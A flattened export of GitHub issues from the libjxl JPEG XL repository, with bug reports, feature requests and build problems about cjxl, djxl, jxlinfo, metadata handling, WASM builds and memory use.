From my understanding this can speed things up so much because it **A)** doesn't need to decode the whole image and **B)** can skip parts of a slower resize operation. For lack of a better reference: https://github.com/libvips/libvips/discussions/2821#discussioncomment-2814406
> libjpeg will only decode enough of the coefficients to generate an image of that size. 8x shrink is especially quick since it just needs to fetch the DC coefficient of each DCT block
For example with [libvips](https://github.com/libvips/libvips):
```
vips black test.jpg 64000 64000
# lossless transcode to JXL
cjxl test.jpg test.jxl
# resize JPEG to 8000x8000 with shrink-on-load
time vips --vips-concurrency=1 jpegload --shrink 8 test.jpg out.jpg
0.99s user 0.03s system 100% cpu 1.016 total
# resize JXL to 8000x8000
time vips --vips-concurrency=1 resize test.jxl out.jpg 0.125
18.46s user 0.50s system 100% cpu 18.907 total
```
You can see that the shrink-on-load feature can make resizing quite a bit faster. Does something similar exist in the JXL API? | shrink-on-load feature | https://api.github.com/repos/libjxl/libjxl/issues/4297/comments | 3 | 2025-06-18T19:39:49Z | 2025-06-21T02:09:34Z | https://github.com/libjxl/libjxl/issues/4297 | 3,157,974,950 | 4,297 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
Compressing and decompressing a PNG with cjxl and djxl changes the value of a pixel.
**To Reproduce**
```sh
git clone https://github.com/libjxl/libjxl.git # Fails at v0.11.1 and at head (0102eef)
cd libjxl
./deps.sh
cmake -S . -B build -DBUILD_TESTING=OFF -DJPEGXL_ENABLE_BENCHMARK=OFF -DJPEGXL_ENABLE_EXAMPLES=OFF -DJPEGXL_ENABLE_OPENEXR=OFF -DJPEGXL_ENABLE_DEVTOOLS=ON -DJPEGXL_ENABLE_JPEGLI=ON -DJPEGXL_ENABLE_JPEGLI_LIBJPEG=OFF -DCMAKE_BUILD_TYPE=Release -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DBUILD_SHARED_LIBS=ON
cmake --build build --parallel
build/tools/cjxl emoji_u1f468_1f3fb_200d_1f373.png -q 100 -e 1 enc.jxl
build/tools/djxl enc.jxl dec.png
compare emoji_u1f468_1f3fb_200d_1f373.png dec.png diff.png
```
Source `emoji_u1f468_1f3fb_200d_1f373.png`:

`diff.png`:

**Environment**
- OS: linux
- Compiler version: clang 19.1.7
- CPU type: x64
- cjxl/djxl version string: v0.12.0 0102eef5 [_AVX2_,SSE4,SSE2] | cjxl -q 100 -e 1 is lossy | https://api.github.com/repos/libjxl/libjxl/issues/4287/comments | 3 | 2025-06-13T11:10:28Z | 2025-06-16T15:23:23Z | https://github.com/libjxl/libjxl/issues/4287 | 3,143,220,623 | 4,287 |
[
"libjxl",
"libjxl"
] | I'm encoding a bayer pattern CFA using jxl via tifffile. For lossless encoding I get decent results, but for anything lossy I very quickly see artifacts. Attached is an image at .25 strength. I'm guessing that CFAs are just treated as grayscale images in JXL vs. having specific support. Is this correct?
 | CFAs and jxl | https://api.github.com/repos/libjxl/libjxl/issues/4282/comments | 13 | 2025-06-11T03:07:09Z | 2025-06-18T16:05:22Z | https://github.com/libjxl/libjxl/issues/4282 | 3,135,338,001 | 4,282 |
[
"libjxl",
"libjxl"
] | I tried to build libjxl but encountered a problem. Skcms from googlesource cannot be accessed. How to solve it ?
```
Cloning into '/libjxl/third_party/skcms'...
fatal: unable to access 'https://skia.googlesource.com/skcms/': The requested URL returned error: 429
fatal: clone of 'https://skia.googlesource.com/skcms' into submodule path '/libjxl/third_party/skcms' failed
```
The error code is 429, but no solution worked even after retries. | skcms cannot be accessed | https://api.github.com/repos/libjxl/libjxl/issues/4280/comments | 3 | 2025-06-10T02:36:32Z | 2025-06-20T11:03:51Z | https://github.com/libjxl/libjxl/issues/4280 | 3,131,962,578 | 4,280 |
[
"libjxl",
"libjxl"
] | For some images, the data reported by jxlinfo may be a little confusing, particularly for occasional users of this handy tool.
If you encode a 32-bit image to JXL in Photoshop with ProPhoto primaries, the following is reported by jxlinfo:
```
JPEG XL file format container (ISO/IEC 18181-2)
JPEG XL image, 1000x1250, lossy, 32-bit float (8 exponent bits) RGB+Alpha
Color space: RGB, Custom, white_point(x=0.345705,y=0.358541), Custom primaries: red(x=0.734700,y=0.265300), green(x=0.159601,y=0.840398), blue(x=0.036598,y=0.000100)Linear transfer function, rendering intent: Relative
```
The "color space:" line is a bit confusing here.
Suggestions for clarity:
- **Show common language representation of major spaces like Adobe RGB and ProPhoto.**
- What does "**Custom**" refer to? I presume the white point - but it isn't clear, especially with the comma separating it from the other values. The following "custom primaries:" more clearly connects to the actual x,y data. If this is white point, probably better to show "Custom white point: x=0.345705,y=0.358541"
- Break the output to **multiple lines** (separate white point from primaries, etc)
- There is **no break/space** before "Linear transfer..." | jxlinfo output may be confusing | https://api.github.com/repos/libjxl/libjxl/issues/4270/comments | 2 | 2025-05-23T15:26:22Z | 2025-06-03T19:19:11Z | https://github.com/libjxl/libjxl/issues/4270 | 3,086,751,109 | 4,270 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
jxlinfo informs about a transcoded jpeg being "(possibly) lossless" even "JPEG bitstream reconstruction data available" - but because cjxl doesn't transcode lossless jpeg, in this case there should be nothing "possibly" about it.
Either a transcoded jpeg should is labeled "lossy" (because the source image was lossy), or "lossless" (because it's a lossless transcode) - or maybe something else like "transcoded"
**To Reproduce**
cjxl test.jpg test.jxl
jxlinfo test.jxl
```
JPEG XL file format container (ISO/IEC 18181-2)
JPEG XL image, 1920x1080, (possibly) lossless, 8-bit RGB
Color space: RGB, D65, sRGB primaries, sRGB transfer function, rendering intent: Relative
JPEG bitstream reconstruction data available
```
**Environment**
- OS: Windows
- Compiler version: clang 20.1.5
- CPU type: x86_64
- cjxl/djxl version string: JPEG XL encoder v0.12.0 34102f07 [_AVX3_ZEN4_,AVX3_DL]
| jxlinfo returns "(possibly) lossless" even if "JPEG bitstream reconstruction data available" | https://api.github.com/repos/libjxl/libjxl/issues/4254/comments | 10 | 2025-05-18T22:06:25Z | 2025-05-22T09:08:33Z | https://github.com/libjxl/libjxl/issues/4254 | 3,072,090,933 | 4,254 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
I wrote a small program that encodes a JXL image using libjxl (via [CImg](https://www.cimg.eu/)). While libjxl can successfully decode the image, jxl-oxide cannot, and it appears that the image is not encoded correctly.
Original jxl-oxide issue: https://github.com/tirr-c/jxl-oxide/issues/456
**To Reproduce**
Steps to reproduce the behavior:
I've made a minimal reproduction here: https://github.com/printfn/repro/tree/cimg-libjxl-spheres
1. (Optional) Run `make` and `./repro` to run the program, which encodes the `spheres.jxl` file (depending on your system you may need to adjust paths in the `Makefile`)
2. Decoding [`spheres.jxl`](https://github.com/printfn/repro/blob/cimg-libjxl-spheres/spheres.jxl) succeeds with `djxl`, but fails with `jxl-oxide`
The initial investigation at https://github.com/tirr-c/jxl-oxide/issues/456 seems to indicate that libjxl is incorrectly setting `modular_16bit_buffers` despite samples being outside the 16-bit range.
**Expected behavior**
It looks like there might be two issues:
* libjxl should have encoded the image such that it can be decoded by jxl-oxide
* libjxl should have refused to decode the image
**Screenshots**
N/A
**Environment**
- OS: macOS
- Compiler version: Apple clang version 17.0.0
- CPU type: aarch64
- cjxl/djxl version string: cjxl v0.11.1 0.11.1 [NEON]
I have also reproduced this on aarch64 Linux.
**Additional context**
The code in CImg.h is a bit strange in that it tries to encode losslessly by setting the distance to zero, but doesn't call `JxlEncoderSetFrameLossless`. But reading the documentation I don't think calling `JxlEncoderSetFrameLossless` is required; the bug seems to be unrelated to whether the image is lossless or not.
<!--
Currently github does not allow uploading files that end in `.jxl`, but when you
rename them for example as `image.jxl.jpg`, it will be possible to upload them
and also view them in browsers that are configured to support it.
See https://github.com/orgs/github-community/discussions/18139
-->
| libjxl image cannot be decoded with jxl-oxide, `modular_16bit_buffers` seems to be incorrectly set | https://api.github.com/repos/libjxl/libjxl/issues/4234/comments | 1 | 2025-05-06T20:12:36Z | 2025-05-09T14:39:17Z | https://github.com/libjxl/libjxl/issues/4234 | 3,043,899,149 | 4,234 |
[
"libjxl",
"libjxl"
] | Hello JPEG XL folks,
Current image formats are focused on 2D images, they have a width and a height. However, there are many use cases where volumetric 3D content is required. This is common in many fields including computer graphics (ex: sampling in 3D or time-evolving 2D), data visualization, neuroscience (NIfTI), medical scans (DICOM for CT/MRI scans), and more. There are even use cases for 4D or higher textures (ex: time-evolving 3D).
Currently, most formats used to store 3D image data, such as neuroscience formats and KTX, operate by storing many layers of 2D images. This neglects optimization opportunities between multiple layers. 3D images require massive amounts of space compared to 2D images, therefore saving space is extremely important.
What I am searching for is an image format that can directly encode multi-dimensional images in an efficient manner, not layers of 2D images. Effectively, a single blob of data similar to JPEG XL, AVIF, WebP, PNG, JPEG, etc.
I can see that Part 10 of the JPEG 2000 standard allows for encoding of volumetric 3D image data. Here is a link to a research paper that explains this and explains the use cases for it: https://www.researchgate.net/publication/221376499_JPEG2000_Part_10_-_Volumetric_data_encoding
Would JPEG XL folks be interested in adding this JPEG 2000 feature to JPEG XL? Since JPEG XL can encode better than JPEG 2000, I'm sure that the JPEG XL team could come up with a better format if there was motivation to do this. Also, even if JPEG 2000 Part 10 can already encode 3D images, there is still the case of 4D images, 5D images, and so on, so the JPEG XL feature could be better by being multi-dimensional.
Thanks,
Aaron Franke
| Multi-dimensional JPEG XL like JPEG 2000 Part 10 | https://api.github.com/repos/libjxl/libjxl/issues/4222/comments | 5 | 2025-04-30T23:39:07Z | 2025-05-02T20:09:53Z | https://github.com/libjxl/libjxl/issues/4222 | 3,032,806,791 | 4,222 |
[
"libjxl",
"libjxl"
] | Hello,
Sorry couldn't find that in the docs or elsewhere, but could you possibly direct me towards simple code how to encode a multiframe image so that its frames are not accumulated in memory but are send encoded to the output in the process. This question comes under (a maybe wrong) assumption that all frames are indeed accumulated in memory, and a worry about memory footprint.
Currently I encode a multiframe image like this:
```
for (allframes) JxlEncoderAddImageFrame
JxlEncoderCloseInput
JxlEncoderProcessOutput
```
I wonder if there is a mechanism similar to JxlEncoderProcessOutput that can be invoked during/between calls to JxlEncoderAddImageFrame
Thank you | saving: how to process outputs while adding more frames? | https://api.github.com/repos/libjxl/libjxl/issues/4217/comments | 2 | 2025-04-29T10:30:54Z | 2025-04-29T20:21:30Z | https://github.com/libjxl/libjxl/issues/4217 | 3,027,829,709 | 4,217 |
[
"libjxl",
"libjxl"
] | 
PNG: 21033 bytes
JXL: 21695 bytes (compression level 11 that no one will ever use; JXL 0.11.1)
WEBP: 16094 bytes | Worse than PNG? | https://api.github.com/repos/libjxl/libjxl/issues/4212/comments | 9 | 2025-04-27T20:05:16Z | 2025-06-19T21:03:16Z | https://github.com/libjxl/libjxl/issues/4212 | 3,023,294,727 | 4,212 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
I am converting a bunch of JPEGs to JXL, then copying the metadata with ExifTool.
When the file is read with a ffmpeg based decoder (mpv/ffplay), there is an error while decoding:
```
[ffmpeg/video] libjxl: Unknown libjxl decode error
Error while decoding frame!
```
imlib2 decoder like feh has no error.
**To Reproduce**
Steps to reproduce the behavior:
`cjxl --distance 0.0 --effort 7 --progressive --brotli_effort 9 --lossless_jpeg 1 blah.jpg blah.jxl`
`exiftool -m -TagsFromFile blah.jpg blah.jxl`
The problem also occurs when adding tags on a new file:
`exiftool -m -Artist='Pat' blah.jxl`
`mpv --loop-playlist=inf --image-display-duration=5 blah.jxl`
**Expected behavior**
The file should play without any error.
**Screenshots**
If applicable, add screenshots or example input/output images to help explain your problem.
**Environment**
- OS: Fedora Linux 42
- Compiler version: gcc (GCC) 15.0.1 20250329 (Red Hat 15.0.1-0)
- CPU type: x86_64
- cjxl/djxl version string: JPEG XL encoder v0.11.1 [AVX2,SSE4,SSE2]
- exiftool: 13.10
- ffmpeg: ffmpeg version 7.1.1 Copyright (c) 2000-2025 the FFmpeg developers
**Additional context**
I am not sure from where the issue comes from:
- libjxl
- exiftool
- or ffmpeg
Since the file is decoded correctly with imlib2, maybe the issue is in ffmpeg? Or ffmpeg is adhering more strictly to the spec, while imlib2 is more lax, and the problem is really in exiftool? | "Corruped" JXL file after copying/adding metadata with Exiftool, but only when read with ffmpeg | https://api.github.com/repos/libjxl/libjxl/issues/4211/comments | 4 | 2025-04-27T05:48:05Z | 2025-06-22T09:40:04Z | https://github.com/libjxl/libjxl/issues/4211 | 3,022,798,198 | 4,211 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
Running on `main` among other output I got error that NC013_Evening_AdobeRGB_16bit.ppm is failed to decode.
**To Reproduce**
Steps to reproduce the behavior: run `./ci.sh benchmark`
**Expected behavior**
No error.
**Screenshots**
Relevant log part:
```
./lib/extras/dec/color_description.cc:106: JXL_FAILURE: Invalid double: Ado
./lib/extras/dec/color_description.cc:165: JXL_RETURN_IF_ERROR code=1: ParseDouble(&xy_tokenizer, c->primaries_red_xy + 0)
./lib/extras/dec/color_description.cc:240: JXL_RETURN_IF_ERROR code=1: ParsePrimaries(&tokenizer, c)
./lib/extras/dec/color_hints.cc:37: JXL_FAILURE: Failed to apply color_space
./lib/extras/dec/color_hints.h:44: JXL_FAILURE: ColorHints::Foreach returned false
./lib/extras/dec/color_hints.cc:27: JXL_RETURN_IF_ERROR code=1: color_hints.Foreach( [color_already_set, is_gray, ppf, &got_color_space]( const std::string& key, const std::string& value) -> Status { if (color_already_set && (key == "color_space" || key == "icc")) { JXL_WARNING("Decoder ignoring %s hint", key.c_str()); return true; } if (key == "color_space") { JxlColorEncoding c_original_external; if (!ParseDescription(value, &c_original_external)) { return JXL_FAILURE("Failed to apply color_space"); } ppf->color_encoding = c_original_external; if (is_gray != (ppf->color_encoding.color_space == JXL_COLOR_SPACE_GRAY)) { return JXL_FAILURE("mismatch between file and color_space hint"); } got_color_space = true; } else if (key == "icc") { const uint8_t* data = reinterpret_cast<const uint8_t*>(value.data()); std::vector<uint8_t> icc(data, data + value.size()); ppf->icc = std::move(icc); ppf->primary_color_representation = PackedPixelFile::kIccIsPrimary; got_color_space = true; } else if (key == "exif") { const uint8_t* data = reinterpret_cast<const uint8_t*>(value.data()); std::vector<uint8_t> blob(data, data + value.size()); ppf->metadata.exif = std::move(blob); } else if (key == "xmp") { const uint8_t* data = reinterpret_cast<const uint8_t*>(value.data()); std::vector<uint8_t> blob(data, data + value.size()); ppf->metadata.xmp = std::move(blob); } else if (key == "jumbf") { const uint8_t* data = reinterpret_cast<const uint8_t*>(value.data()); std::vector<uint8_t> blob(data, data + value.size()); ppf->metadata.jumbf = std::move(blob); } else { JXL_WARNING("Ignoring %s hint", key.c_str()); } return true; })
./lib/extras/dec/pnm.cc:465: JXL_RETURN_IF_ERROR code=1: ApplyColorHints(color_hints, false, header.is_gray, ppf)
./lib/extras/dec/decode.cc:164: JXL_FAILURE: Codecs failed to decode
Failed to decode /tmp/tmp.4hFRoxP6RF/adobe16/NC013_Evening_AdobeRGB_16bit.ppm
```
**Environment**
- OS: Ubuntu 24.04 x64
- Compiler version: GCC 11-14, Clang 18-20
- CPU type: x86_64
- version string: benchmark_xl v0.12.0 7921d602 [_AVX2_,SSE4,SSE2] | Failure in benchmark | https://api.github.com/repos/libjxl/libjxl/issues/4187/comments | 0 | 2025-04-13T19:37:28Z | 2025-04-18T08:39:28Z | https://github.com/libjxl/libjxl/issues/4187 | 2,991,440,689 | 4,187 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
The attached image takes an infinite amount of time to compress at compression level 11
**To Reproduce**
Steps to reproduce the behavior: compress losslessly at level 11
**Environment**
- OS: 32bit
- Compiler version: N/A
- CPU type: Any x86 CPU
- cjxl/djxl version string: 0.11.1
 | A tiny image takes an infinite amount of time to compress at compression level 11 | https://api.github.com/repos/libjxl/libjxl/issues/4186/comments | 3 | 2025-04-12T14:29:02Z | 2025-04-15T02:26:59Z | https://github.com/libjxl/libjxl/issues/4186 | 2,990,502,372 | 4,186 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
EXIF rotation doesn't seem to work for https://tinystash.undef.im/il/5yEGgbmBcRbbreTQ29RRAPtMZz5MTB72cwMvMdTGu2AobkSbjmEHm7XeCHBpi3tUkce1pVeCpd9SwdyeNtAqzzvh.jxl
The jxl file has the rotation tag but it doesn't seem to apply by neither djxl, nsxiv and sxiv (not sure if really related). The same tags work when `exiftool -tagsFromFile` for a jpeg and fed to nsxiv/sxiv.
**To Reproduce**
`djxl 5yEGgbmBcRbbreTQ29RRAPtMZz5MTB72cwMvMdTGu2AobkSbjmEHm7XeCHBpi3tUkce1pVeCpd9SwdyeNtAqzzvh.jxl 5yEGgbmBcRbbreTQ29RRAPtMZz5MTB72cwMvMdTGu2AobkSbjmEHm7XeCHBpi3tUkce1pVeCpd9SwdyeNtAqzzvh.png`
Then `exiftool` says the decoded image is `Horizontal (normal)`.
**Expected behavior**
Either the image being rotated during decoding, or the EXIF orientation tag being preserved.
**Environment**
- OS: Gentoo Lignux
- Compiler version: gcc (Gentoo Hardened 14.2.1_p20250301 p8) 14.2.1 20250301
- CPU type: amd64
- cjxl/djxl version string: djxl v0.11.1 [AVX2]
| EXIF rotation is wonky | https://api.github.com/repos/libjxl/libjxl/issues/4182/comments | 2 | 2025-04-09T14:16:26Z | 2025-04-18T15:30:59Z | https://github.com/libjxl/libjxl/issues/4182 | 2,982,979,512 | 4,182 |
[
"libjxl",
"libjxl"
] | null | Add option to preserve timestamp from source file | https://api.github.com/repos/libjxl/libjxl/issues/4181/comments | 1 | 2025-04-06T12:43:54Z | 2025-04-09T18:15:49Z | https://github.com/libjxl/libjxl/issues/4181 | 2,974,932,658 | 4,181 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
The WASM oneshot encoder runs out of memory trying to encode the test.pfm example in the demo script
**To Reproduce**
Build WASM with:
```
BUILD_TARGET=wasm32 SKIP_TEST=1 emconfigure ./ci.sh release
```
Try a test encode with:
```
echo -e -n "PF\n1 1\n-1.0\n\0\0\x80\x3f\0\0\x80\x3f\0\0\x80\x3f" > test.pfm
node build-wasm32/encode_oneshot.js test.pfm test.jxl
```
**Expected behavior**
Encodes to JXL file
**Screenshots**
RuntimeError: Aborted(OOM). Build with -sASSERTIONS for more info.
at abort (/workspaces/codecs/packages/libjxl/extern/libjxl/build-wasm32/encode_oneshot.js:2:7496)
at abortOnCannotGrowMemory (/workspaces/codecs/packages/libjxl/extern/libjxl/build-wasm32/encode_oneshot.js:2:79026)
at _emscripten_resize_heap (/workspaces/codecs/packages/libjxl/extern/libjxl/build-wasm32/encode_oneshot.js:2:79129)
at wasm://wasm/009c9f8e:wasm-function[319]:0x4340c
at wasm://wasm/009c9f8e:wasm-function[55]:0x4096
at wasm://wasm/009c9f8e:wasm-function[391]:0x55487
at wasm://wasm/009c9f8e:wasm-function[116]:0xa78c
at wasm://wasm/009c9f8e:wasm-function[585]:0x9f4c5
at wasm://wasm/009c9f8e:wasm-function[1403]:0x1e6f02
at wasm://wasm/009c9f8e:wasm-function[1692]:0x1f8665
**Environment**
- OS: Docker build environment as specified in the debian and wasm build instructions
- Compiler version: [e.g. clang 11.0.1]
- CPU type: [e.g. x86_64]
- cjxl/djxl version string: [e.g. cjxl [v0.3.7 | SIMD supported: SSE4,Scalar]]
**Additional context**
Add any other context about the problem here.
Tried settings allow memory growth and higher size limits, but I get the same issues. Other builds I've tried to create WASM environments also encounter what I think is the same issue, although I haven't finished debugging it to know for sure.
| WASM oneshot encoder build out of memory on test.pfm example | https://api.github.com/repos/libjxl/libjxl/issues/4177/comments | 2 | 2025-04-01T17:34:33Z | 2025-05-06T11:50:14Z | https://github.com/libjxl/libjxl/issues/4177 | 2,964,126,955 | 4,177 |
[
"libjxl",
"libjxl"
] | File:
libjxl-main/lib/extras/enc/jpegli.cc line 390
Code:
std::vector<uint8_t> pixels; // <-- unused | unused variable | https://api.github.com/repos/libjxl/libjxl/issues/4175/comments | 0 | 2025-03-31T14:26:40Z | 2025-03-31T14:26:40Z | https://github.com/libjxl/libjxl/issues/4175 | 2,960,670,018 | 4,175 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
**To Reproduce**
32bit libJXL crashes when compressing larger (1280x1024 is enough but 1920x1080 is certain) images at levels 10 and 11 because it tries to allocate/use too much RAM (over 2GB).
**Expected behavior**
No crash. The library should probably keep track of its memory allocations. If that's not feasible or will result in a major slowdown, you could/should print a warning that this operation may result in a crash. It's really up to you to decide.
**Screenshots**
N/a.
**Environment**
- OS: any 32bit environment
- Compiler version: any
- CPU type: any
- cjxl/djxl version string: 0.11.1 | 32bit JXL crashes when compressing larger images at compression levels 10 and 11 | https://api.github.com/repos/libjxl/libjxl/issues/4167/comments | 6 | 2025-03-29T15:56:29Z | 2025-06-19T22:48:30Z | https://github.com/libjxl/libjxl/issues/4167 | 2,958,167,946 | 4,167 |
[
"libjxl",
"libjxl"
] | There is a memory leak in the `GetContext` function in jxl_cms.cc. This function uses a `static thread_local` variable to allocate a CMS "context" object, by calling `cmsCreateContext`. But the code never invokes `cmsDeleteContext`, so one of these objects is being leaked for each thread.
The problematic code looks like this:
```
cmsContext GetContext() {
static thread_local void* context_;
if (context_ == nullptr) {
context_ = cmsCreateContext(nullptr, nullptr);
```
I have tried out a fix using `std::unique_ptr` that seems to work fine.
```
cmsContext GetContext() {
static thread_local std::unique_ptr<void, void(*)(void*)> context_(nullptr, [](void* ptr)
{
if (ptr != nullptr) cmsDeleteContext(static_cast<cmsContext>(ptr));
});
if (context_ == nullptr) {
context_.reset(cmsCreateContext(nullptr, nullptr));
JXL_DASSERT(context_ != nullptr);
cmsSetLogErrorHandlerTHR(static_cast<cmsContext>(context_.get()), &ErrorHandler);
}
return static_cast<cmsContext>(context_.get());
}
```
If you agree, I would like someone to create a PR to submit this fix.
| Memory leak in jxl_cms.cc | https://api.github.com/repos/libjxl/libjxl/issues/4166/comments | 0 | 2025-03-29T09:24:55Z | 2025-03-29T09:24:55Z | https://github.com/libjxl/libjxl/issues/4166 | 2,957,891,506 | 4,166 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
When an input file in JXL format has an alpha channel and a color profile, removing the alpha channel using ImageMagick will also drop the color profile, which can't subsequently be reapplied with `magick` or `cjxl`.
**To Reproduce**
Using the attached file `f42-01-day.jxl` as an example:
```console
$ # Original file has alpha channel, embedded color profile
$ magick identify -verbose f42-01-day.jxl |grep -E -i '(alpha|icc)'
Type: TrueColorAlpha
Alpha: 1-bit
Alpha:
Profile-icc: 9080 bytes
icc:copyright: Copyright 2015, Elle Stone (website: http://ninedegreesbelow.com/; email: ellestone@ninedegreesbelow.com). This ICC profile is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License (https://creativecommons.org/licenses/by-sa/3.0/legalcode).
icc:description: sRGB-elle-V2-srgbtrc.icc
$ # Remove alpha channel using ImageMagick
$ magick f42-01-day.jxl -quality 100 -alpha off f42-01-day_noalpha.jxl
$ # Resulting file has no alpha, but no profile as well
$ magick identify -verbose f42-01-day_noalpha.jxl |grep -E -i '(alpha|icc)'
Filename: f42-01-day_noalpha.jxl
Profile-icc: 536 bytes
icc:copyright: CC0
icc:description: RGB_D65_SRG_Rel_SRG
$ # Extract and attempt to reapply ICC profile
$ djxl f42-01-day.jxl f42-01-day.exif --icc_out=f42-01-day.icc -v -v -v
JPEG XL decoder v0.10.4 [SSE2]
Read 2030921 compressed bytes.
Decoded to pixels.
Encoding decoded image
Wrote output to f42-01-day.exif
4032 x 3024, 10758.651 MP/s [10758.65, 10758.65], , 1 reps, 2 threads.
$ # (exif file is empty, but icc file contains profile:)
$ file f42-01-day.icc
f42-01-day.icc: color profile 2.1, type lcms, RGB/XYZ-mntr device by lcms, 9080 bytes, 10-11-2015 12:18:56 "sRGB-elle-V2-srgbtrc.icc"
$ # Attempt to reapply to converted, alpha-stripped JXL using cjxl
$ cjxl f42-01-day_noalpha.jxl f42-01-day_new.jxl --quality=100 \
--lossless_jpeg=1 -x icc_profile=f42-01-day.icc -v -v -v
JPEG XL encoder v0.10.4 [SSE2]
Read 4032x3024 image, 2165766 bytes, 8.9 MP/s
Encoding [Modular, lossless, effort: 7]
Compressed to 2165.8 kB (1.421 bpp).
4032 x 3024, 0.663 MP/s [0.66, 0.66], , 1 reps, 2 threads.
$ # Output file still has no embedded profile
$ magick identify -verbose f42-01-day_new.jxl |grep -E -i '(alpha|icc)'
Profile-icc: 536 bytes
icc:copyright: CC0
icc:description: RGB_D65_SRG_Rel_SRG
```
**Expected behavior**
Profile is preserved during initial conversion with ImageMagick, and/or reapplied by cjxl when requested.
In addition, if cjxl ignores or rejects `-x icc_profile=` or any other option, some sort of message to that effect (along with, ideally, an explanation why) should be included in at least `cjxl -v -v -v` output. Silently not applying options set during conversion isn't particularly helpful.
**Input file**
`f42-01-day.jxl` in zip container: [f42-01-day.zip](https://github.com/user-attachments/files/19495672/f42-01-day.zip)
**Environment**
- OS: Fedora 41
- Compiler version: gcc 14.2.1
- CPU type: x86_64
- cjxl/djxl version string: cjxl v0.10.4 [SSE2]
**Additional context**
The input file is one of the background images which will be included in the upcoming Fedora 42. The background format is changing from PNG to JXL with this release.
However, due to a bug in the background handling code, to avoid graphical corruption PNG or JXL backgrounds _must not_ have an alpha channel.
The original source file is a Krita document, which is being exported to JXL from Krita. Krita's export process does not provide the option to export without an alpha channel -- if the output format supports alpha (as JXL does), it will be included in the export. Hence the need to remove the alpha channel post-export.
<!--
Currently github does not allow uploading files that end in `.jxl`, but when you
rename them for example as `image.jxl.jpg`, it will be possible to upload them
and also view them in browsers that are configured to support it.
See https://github.com/orgs/github-community/discussions/18139
-->
| losing color profile when ImageMagick converts JXL -> JXL to remove alpha, can't reapply with libjxl / cjxl | https://api.github.com/repos/libjxl/libjxl/issues/4164/comments | 4 | 2025-03-27T23:47:56Z | 2025-03-30T18:40:26Z | https://github.com/libjxl/libjxl/issues/4164 | 2,954,682,159 | 4,164 |
[
"libjxl",
"libjxl"
] | In relation to #2284, cjpegli generates subsampled RGB JPEGs by default when `--xyb` is used. JPEG XL only supports transcoding 4:4:4 RGB JPEGs, causing an error unless `--chroma_subsampling 444` is also specified.
As Jon said in the other issue, not being able to transcode to JXL is shooting ourselves in the foot. Changing the default to 4:4:4 would allow transcoding while also increasing quality at a minor size penalty.
Doing a quick test, 4:4:4 is 7% larger and 2.6 higher SSIMULACRA2 score, with JXL transcoding increasing it by another 1.15 while being 7.5% smaller than current XYB JPEG output. | cjpegli XYB defaults to non-transcodable output | https://api.github.com/repos/libjxl/libjxl/issues/4163/comments | 1 | 2025-03-26T02:16:01Z | 2025-04-25T21:16:11Z | https://github.com/libjxl/libjxl/issues/4163 | 2,948,210,794 | 4,163 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
Here is a [photo of a bird](https://www.lovethegarden.com/sites/default/files/content/articles/UK_wildbirds-10-house-sparrow.jpg).
Here are the sizes of different encodings of the bird using `libjxl`'s `cjxl` command-line tool, using default `--effort=7`.
Description | Size (kB) | Command
-------------------------------------|-----------|--------------------------------
JPG (original) | 101 | -
JXL (lossless, transcoded) | 88 | `./cjxl bird.jpg bird-transcoded.jxl`
JXL (lossless, transcoded, prog.) | 92 | `./cjxl bird.jpg bird-transcoded-progressive.jxl -p`
JXL (visually lossless) | 146 | `./cjxl bird.jpg bird-visually-lossless.jxl --lossless_jpeg=0 --quality=90`
JXL (visually lossless, progressive) | 160 | `./cjxl bird.jpg bird-visually-lossless-progressive.jxl --lossless_jpeg=0 --quality=90 -p`
JXL (lossless) | 641 | `./cjxl bird.jpg bird-lossless.jxl --lossless_jpeg=0 --quality=100`
JXL (lossless, progressive) | 1941 | `./cjxl bird.jpg bird-lossless-progressive.jxl --lossless_jpeg=0 --quality=100 -p`
PNG (lossless) | 1137 | IrfanView
Here are the same, but with `--effort=10`.
Description | Size (kB) | Command
-------------------------------------|-----------|--------------------------------
JPG (original) | 101 | -
JXL (lossless, transcoded) | 87 | `./cjxl bird.jpg bird-transcoded-effort.jxl --effort=10`
JXL (lossless, transcoded, prog.) | 91 | `./cjxl bird.jpg bird-transcoded-progressive-effort.jxl -p --effort=10`
JXL (visually lossless) | 150 | `./cjxl bird.jpg bird-visually-lossless-effort.jxl --lossless_jpeg=0 --quality=90 --effort=10`
JXL (visually lossless, progressive) | 163 | `./cjxl bird.jpg bird-visually-lossless-progressive-effort.jxl --lossless_jpeg=0 --quality=90 -p --effort=10`
JXL (lossless) | 610 | `./cjxl bird.jpg bird-lossless-effort.jxl --lossless_jpeg=0 --quality=100 --effort=10`
JXL (lossless, progressive) | 1095 | `./cjxl bird.jpg bird-lossless-progressive-effort.jxl --lossless_jpeg=0 --quality=100 -p --effort=10`
PNG (lossless) | 1137 | IrfanView
**To Reproduce**
See above.
**Expected behavior**
I was expecting JPEG XL visually lossless encoding to be smaller or of comparable size to JPEG, but instead it is about 1.5x in size. Increasing effort did not help.
**Environment**
- OS: Linux Ubuntu (Windows Subsystem for Linux in Windows 11)
- Compiler version: Ubuntu clang version 14.0.0-1ubuntu1.1
- CPU type: x64
- cjxl version string: JPEG XL encoder v0.12.0 798512a9 [_AVX2_,SSE4,SSE2]
| Encoding a JPEG as JXL increases size | https://api.github.com/repos/libjxl/libjxl/issues/4162/comments | 8 | 2025-03-24T18:35:58Z | 2025-03-25T23:45:35Z | https://github.com/libjxl/libjxl/issues/4162 | 2,944,141,598 | 4,162 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
Encoder is broken in a special case
[bugreport.tar.gz](https://github.com/user-attachments/files/19368999/bugreport.tar.gz)
**To Reproduce**
Steps to reproduce the behavior:
(intended to be reproduced on an debian system)
Uncompress the file bugreport.tar.gz
cd bugreport
bash bugreport.sh
**Expected behavior**
No error message. Compressed image is produced.
**Screenshots**
Output on my system see the file bugreport.log.
**Environment**
- OS: [Windows,Linux,?]
- Compiler version: [unknown]
- CPU type: [x86_64]
